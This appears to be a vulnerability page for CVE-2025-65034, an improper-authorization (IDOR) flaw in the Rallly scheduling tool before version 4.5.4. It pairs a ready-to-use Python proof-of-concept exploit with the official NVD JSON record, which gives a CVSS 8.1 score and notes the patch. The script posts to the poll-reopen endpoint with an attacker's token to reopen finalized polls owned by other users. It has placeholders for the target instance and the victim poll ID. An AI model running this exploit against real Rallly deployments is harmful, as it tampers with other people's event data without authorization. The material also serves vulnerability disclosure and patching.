CVE-2025-65034

import requests import json # CVE-2025-65034 PoC - Rallly IDOR Vulnerability # Description: Authenticated users can reopen finalized polls belonging to other users TARGET_URL = "https://your-rallly-instance.com" ATTACKER_TOKEN = "your-authentication-token" def exploit_reopen_poll(target_poll_id): """ Reopen any finalized poll by manipulating pollId parameter This exploits the IDOR vulnerability in Rallly < 4.5.4 """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Identify the poll you want to reopen (must be in finalized state) target_poll_id = target_poll_id # Step 2: Send request to reopen the poll (IDOR - no ownership check) reopen_endpoint = f"{TARGET_URL}/api/polls/{target_poll_id}/reopen" try: response = requests.post(reopen_endpoint, headers=headers, json={}) if response.status_code == 200: print(f"[+] SUCCESS: Poll {target_poll_id} has been reopened!") print(f"[+] Response: {response.json()}") return True else: print(f"[-] FAILED: Status code {response.status_code}") print(f"[-] Response: {response.text}") return False except Exception as e: print(f"[-] ERROR: {str(e)}") return False if __name__ == "__main__": # Example: Reopen a poll with known pollId victim_poll_id = "victim-poll-id-here" exploit_reopen_poll(victim_poll_id)

{"cve": {"id": "CVE-2025-65034", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:51.300", "lastModified": "2025-11-24T18:02:45.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization vulnerability allows any authenticated user to reopen finalized polls belonging to other users by manipulating the pollId parameter. This can disrupt events managed by other users and compromise both availability and integrity of poll data. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}